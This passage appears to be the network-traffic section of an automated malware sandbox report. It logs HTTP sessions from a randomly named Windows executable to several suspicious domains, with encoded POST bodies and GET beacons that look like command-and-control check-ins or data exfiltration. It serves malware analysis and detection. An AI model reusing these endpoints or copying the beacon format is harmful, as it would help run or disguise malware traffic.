                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID: 15 | Source IP: 192.168.2.5 | Source Port: 49728 | Destination IP: 203.161.55.102 | Destination Port: 80 | PID: 5784 | Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:02.231278896 CEST | 1833 | OUT | POST /tb8p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.lacemalt.top
                                              Origin: http://www.lacemalt.top
                                              Referer: http://www.lacemalt.top/tb8p/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 6e 4d 69 30 42 47 77 71 58 4e 49 41 62 45 62 54 4c 4f 56 7a 50 35 66 61 4c 61 6c 67 30 67 6f 4e 38 65 78 33 71 37 6c 54 59 48 54 50 50 52 70 63 48 5a 67 68 73 49 53 56 67 37 63 4a 79 57 64 43 78 55 55 69 64 70 4e 2f 47 79 62 39 6d 52 74 57 65 47 65 71 74 6f 53 35 66 30 62 46 48 65 39 4d 68 6f 50 6b 52 63 45 63 34 65 4e 4c 2b 67 50 6c 75 6d 71 73 2b 72 73 78 75 46 47 72 37 39 43 69 4e 46 62 69 64 71 74 33 38 35 6e 45 41 57 59 58 42 44 33 76 37 55 65 69 4c 35 44 45 69 76 72 6a 38 31 46 65 66 43 2b 33 6e 57 61 72 4e 49 31 48 4a 73 6e 58 6e 48 67 43 37 7a 79 72 62 33 64 78 42 6d 38 49 4b 35 2f 62 53 66 4c 6e 2f 48 2f 4a 35 66 59 68 37 30 6c 6e 66 38 68 69 44 2b 5a 53 41 68 6b 71 32 2f 37 4f 65 38 41 4e 42 75 4a 4d 4c 57 6f 49 6b 74 65 6f 62 6d 2b 63 64 4f 39 57 6e 7a 6f 67 45 4b 4c 41 4c 44 6d 46 73 45 4c 73 39 31 33 42 65 46 4a 70 69 75 76 6c 45 2b 43 71 63 51 4f 59 32 65 74 2b 64 50 46 4f 52 63 53 59 57 36 59 7a 4a 4d 77 6e 59 56 35 32 44 75 77 75 78 66 31 64 54 65 45 68 6b 62 6c 52 36 [TRUNCATED]
                                              Data Ascii: k06T=nMi0BGwqXNIAbEbTLOVzP5faLalg0goN8ex3q7lTYHTPPRpcHZghsISVg7cJyWdCxUUidpN/Gyb9mRtWeGeqtoS5f0bFHe9MhoPkRcEc4eNL+gPlumqs+rsxuFGr79CiNFbidqt385nEAWYXBD3v7UeiL5DEivrj81FefC+3nWarNI1HJsnXnHgC7zyrb3dxBm8IK5/bSfLn/H/J5fYh70lnf8hiD+ZSAhkq2/7Oe8ANBuJMLWoIkteobm+cdO9WnzogEKLALDmFsELs913BeFJpiuvlE+CqcQOY2et+dPFORcSYW6YzJMwnYV52Duwuxf1dTeEhkblR6 [TRUNCATED]
                                              Jul 3, 2024 16:41:02.849128962 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 03 Jul 2024 14:41:02 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID: 16 | Source IP: 192.168.2.5 | Source Port: 49729 | Destination IP: 203.161.55.102 | Destination Port: 80 | PID: 5784 | Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:04.762644053 CEST | 544 | OUT | GET /tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.lacemalt.top
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:41:05.396370888 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 03 Jul 2024 14:41:05 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID: 17 | Source IP: 192.168.2.5 | Source Port: 49730 | Destination IP: 108.179.193.98 | Destination Port: 80 | PID: 5784 | Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:10.750220060 CEST | 823 | OUT | POST /xti2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.siteblogoficialon.com
                                              Origin: http://www.siteblogoficialon.com
                                              Referer: http://www.siteblogoficialon.com/xti2/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 64 44 62 64 37 46 49 2b 61 42 75 49 71 45 63 63 58 58 55 52 4e 53 4f 70 57 46 47 59 36 44 6a 34 4b 72 33 6b 6d 4e 71 64 74 73 64 47 52 61 71 78 72 4c 52 76 52 4a 68 38 69 57 50 72 7a 72 39 72 48 48 4e 32 61 37 4b 65 56 47 34 47 4e 38 4a 61 46 49 4e 38 78 32 36 2b 47 52 44 37 49 6a 34 68 4d 74 4d 48 4c 5a 77 4b 5a 69 77 54 67 2b 55 46 43 2b 6d 4a 2f 67 33 70 6e 42 2b 61 54 76 6b 30 63 35 4f 6d 49 71 43 4b 46 59 47 69 2b 39 50 35 47 50 2b 33 4a 6f 6f 4c 63 36 34 62 43 63 79 6d 73 74 33 32 78 43 52 42 7a 43 67 79 30 59 55 48 6e 35 47 2b 31 46 6b 46 35 33 6f 70 55 49 57 55 59 75 2b 4b 53 37 38 3d
                                              Data Ascii: k06T=dDbd7FI+aBuIqEccXXURNSOpWFGY6Dj4Kr3kmNqdtsdGRaqxrLRvRJh8iWPrzr9rHHN2a7KeVG4GN8JaFIN8x26+GRD7Ij4hMtMHLZwKZiwTg+UFC+mJ/g3pnB+aTvk0c5OmIqCKFYGi+9P5GP+3JooLc64bCcymst32xCRBzCgy0YUHn5G+1FkF53opUIWUYu+KS78=
                                              Jul 3, 2024 16:41:11.412092924 CEST | 361 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:11 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Location: https://www.siteblogoficialon.com/xti2/
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID: 18 | Source IP: 192.168.2.5 | Source Port: 49731 | Destination IP: 108.179.193.98 | Destination Port: 80 | PID: 5784 | Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:13.298605919 CEST | 843 | OUT | POST /xti2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.siteblogoficialon.com
                                              Origin: http://www.siteblogoficialon.com
                                              Referer: http://www.siteblogoficialon.com/xti2/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 64 44 62 64 37 46 49 2b 61 42 75 49 71 6c 73 63 55 30 4d 52 4c 79 4f 75 5a 6c 47 59 77 6a 69 2f 4b 72 37 6b 6d 4d 75 4e 74 61 6c 47 53 2b 6d 78 71 4a 35 76 43 35 68 38 77 32 50 75 35 4c 39 67 48 48 4a 2b 61 2b 71 65 56 47 73 47 4e 2b 52 61 46 37 56 2f 77 6d 36 34 53 68 44 35 48 44 34 68 4d 74 4d 48 4c 61 4d 67 5a 69 34 54 67 4f 6b 46 44 61 4b 4b 68 51 33 71 33 52 2b 61 58 76 6b 77 63 35 50 7a 49 72 66 43 46 61 2b 69 2b 39 2f 35 48 65 2b 30 65 59 6f 4e 57 61 35 30 47 4f 58 6f 6d 66 2f 2f 75 30 52 41 73 54 6b 39 31 75 35 74 39 62 4f 57 6d 6c 49 39 70 6b 67 65 46 34 33 39 43 4e 75 36 4d 73 70 41 34 59 62 42 6d 32 45 74 2f 64 64 63 49 48 70 79 39 6e 74 65
                                              Data Ascii: k06T=dDbd7FI+aBuIqlscU0MRLyOuZlGYwji/Kr7kmMuNtalGS+mxqJ5vC5h8w2Pu5L9gHHJ+a+qeVGsGN+RaF7V/wm64ShD5HD4hMtMHLaMgZi4TgOkFDaKKhQ3q3R+aXvkwc5PzIrfCFa+i+9/5He+0eYoNWa50GOXomf//u0RAsTk91u5t9bOWmlI9pkgeF439CNu6MspA4YbBm2Et/ddcIHpy9nte
                                              Jul 3, 2024 16:41:13.938481092 CEST | 361 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:13 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Location: https://www.siteblogoficialon.com/xti2/
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID: 19 | Source IP: 192.168.2.5 | Source Port: 49732 | Destination IP: 108.179.193.98 | Destination Port: 80 | PID: 5784 | Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:15.828269958 CEST | 1860 | OUT | POST /xti2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.siteblogoficialon.com
                                              Origin: http://www.siteblogoficialon.com
                                              Referer: http://www.siteblogoficialon.com/xti2/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 64 44 62 64 37 46 49 2b 61 42 75 49 71 6c 73 63 55 30 4d 52 4c 79 4f 75 5a 6c 47 59 77 6a 69 2f 4b 72 37 6b 6d 4d 75 4e 74 61 74 47 52 4c 36 78 72 75 6c 76 42 35 68 38 7a 32 50 76 35 4c 39 39 48 48 78 36 61 2b 75 4f 56 46 55 47 4f 62 46 61 48 4b 56 2f 35 6d 36 34 51 68 44 34 49 6a 35 70 4d 72 73 62 4c 5a 30 67 5a 69 34 54 67 49 41 46 4b 75 6d 4b 6a 51 33 70 6e 42 2b 6f 54 76 6b 59 63 39 61 45 49 72 71 67 46 70 32 69 2b 5a 62 35 4c 49 71 30 43 49 6f 50 56 61 35 73 47 4f 72 6a 6d 62 6e 5a 75 30 4d 6e 73 55 6f 39 33 59 30 71 6d 75 75 73 6b 47 42 52 6d 6e 6b 70 64 39 4c 6c 4e 2f 32 7a 41 64 4a 62 31 61 33 4b 76 32 45 6f 30 4d 55 73 55 54 70 61 77 79 52 52 4e 59 62 4c 69 4b 4e 67 35 51 41 62 6f 31 43 5a 38 62 58 54 68 57 4a 36 4f 54 37 56 6b 41 6b 70 30 63 4e 43 6d 50 69 30 57 4c 70 2b 4c 43 4d 52 42 2f 52 6b 4e 49 48 6a 6e 62 2b 4d 45 50 30 74 66 34 30 4b 36 53 33 5a 4a 69 44 49 4f 69 53 74 4b 48 6b 56 37 66 46 49 37 76 4b 36 7a 2b 48 31 35 33 4c 44 6c 4b 55 77 39 53 44 5a 32 55 72 55 59 [TRUNCATED]
                                              Data Ascii: k06T=dDbd7FI+aBuIqlscU0MRLyOuZlGYwji/Kr7kmMuNtatGRL6xrulvB5h8z2Pv5L99HHx6a+uOVFUGObFaHKV/5m64QhD4Ij5pMrsbLZ0gZi4TgIAFKumKjQ3pnB+oTvkYc9aEIrqgFp2i+Zb5LIq0CIoPVa5sGOrjmbnZu0MnsUo93Y0qmuuskGBRmnkpd9LlN/2zAdJb1a3Kv2Eo0MUsUTpawyRRNYbLiKNg5QAbo1CZ8bXThWJ6OT7VkAkp0cNCmPi0WLp+LCMRB/RkNIHjnb+MEP0tf40K6S3ZJiDIOiStKHkV7fFI7vK6z+H153LDlKUw9SDZ2UrUY [TRUNCATED]
                                              Jul 3, 2024 16:41:16.468796968 CEST | 361 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:16 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Location: https://www.siteblogoficialon.com/xti2/
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 49733 | Destination IP: 108.179.193.98 | Destination Port: 80 | PID: 5784 | Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:18.356312990 CEST | 553 | OUT | GET /xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.siteblogoficialon.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:41:19.225675106 CEST | 519 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:18 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Location: https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 49734 | Destination IP: 35.241.34.216 | Destination Port: 80 | PID: 5784 | Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:40.894341946 CEST | 790 | OUT | POST /7npk/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mg55aa.xyz
                                              Origin: http://www.mg55aa.xyz
                                              Referer: http://www.mg55aa.xyz/7npk/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 36 6e 4a 46 42 55 6e 39 4e 65 33 4f 32 6c 63 31 37 7a 79 50 34 55 5a 66 67 68 59 64 56 38 51 4c 45 54 61 71 65 35 67 48 61 51 4b 52 54 6d 73 76 37 5a 35 32 38 6f 31 39 33 67 4a 53 43 45 56 6d 6b 6f 4c 5a 2f 77 68 55 41 32 49 65 6a 6c 42 61 35 70 49 69 46 59 7a 62 68 45 42 2f 35 72 53 66 51 67 44 4f 5a 56 6c 66 68 35 6f 39 69 6e 42 45 77 4e 30 38 30 7a 6e 52 6e 45 4e 53 69 52 45 59 78 77 30 52 53 6f 5a 59 51 41 6f 36 42 43 74 58 45 2f 59 38 4d 43 47 4c 69 6c 70 42 56 74 38 6e 6b 6e 69 4e 45 73 37 4f 6b 6e 32 4b 4b 44 69 39 38 53 6a 46 5a 4b 67 48 53 2b 72 6b 53 62 57 64 4e 44 43 66 76 32 6b 3d
                                              Data Ascii: k06T=6nJFBUn9Ne3O2lc17zyP4UZfghYdV8QLETaqe5gHaQKRTmsv7Z528o193gJSCEVmkoLZ/whUA2IejlBa5pIiFYzbhEB/5rSfQgDOZVlfh5o9inBEwN080znRnENSiREYxw0RSoZYQAo6BCtXE/Y8MCGLilpBVt8nkniNEs7Okn2KKDi98SjFZKgHS+rkSbWdNDCfv2k=
                                              Jul 3, 2024 16:41:41.533133030 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                              Server: nginx/1.20.2
                                              Date: Wed, 03 Jul 2024 14:41:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Via: 1.1 google
                                              Connection: close
                                              Jul 3, 2024 16:41:41.535643101 CEST | 157 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                              Session ID: 22
                                              Source IP: 192.168.2.5
                                              Source Port: 49735
                                              Destination IP: 35.241.34.216
                                              Destination Port: 80
                                              PID: 5784
                                              Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:41:43.452306032 CEST | 810 bytes | OUT | POST /7npk/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mg55aa.xyz
                                              Origin: http://www.mg55aa.xyz
                                              Referer: http://www.mg55aa.xyz/7npk/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 36 6e 4a 46 42 55 6e 39 4e 65 33 4f 33 46 4d 31 35 55 75 50 36 30 5a 63 6c 68 59 64 50 4d 51 50 45 54 65 71 65 38 5a 59 5a 69 2b 52 55 43 6f 76 36 59 35 32 39 6f 31 39 39 41 4a 74 66 55 56 39 6b 6f 58 72 2f 30 68 55 41 32 63 65 6a 67 39 61 35 61 77 68 45 49 7a 56 36 55 42 35 6b 37 53 66 51 67 44 4f 5a 56 78 35 68 34 41 39 6a 58 52 45 33 5a 41 2f 2b 54 6e 4f 75 6b 4e 53 6d 52 45 63 78 77 30 76 53 70 46 32 51 43 67 36 42 48 52 58 45 72 30 6a 47 43 47 4e 2f 31 6f 41 51 74 70 52 70 46 71 36 50 61 75 58 78 46 71 2f 43 56 50 58 6d 77 72 74 4b 71 4d 2f 43 74 6a 54 44 72 33 30 58 67 53 76 78 68 7a 44 79 74 75 56 59 73 55 50 48 61 45 52 56 6f 72 62 71 59 59 6f
                                              Data Ascii: k06T=6nJFBUn9Ne3O3FM15UuP60ZclhYdPMQPETeqe8ZYZi+RUCov6Y529o199AJtfUV9koXr/0hUA2cejg9a5awhEIzV6UB5k7SfQgDOZVx5h4A9jXRE3ZA/+TnOukNSmREcxw0vSpF2QCg6BHRXEr0jGCGN/1oAQtpRpFq6PauXxFq/CVPXmwrtKqM/CtjTDr30XgSvxhzDytuVYsUPHaERVorbqYYo
                                              Jul 3, 2024 16:41:44.097403049 CEST | 176 bytes | IN | HTTP/1.1 405 Method Not Allowed
                                              Server: nginx/1.20.2
                                              Date: Wed, 03 Jul 2024 14:41:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Via: 1.1 google
                                              Connection: close
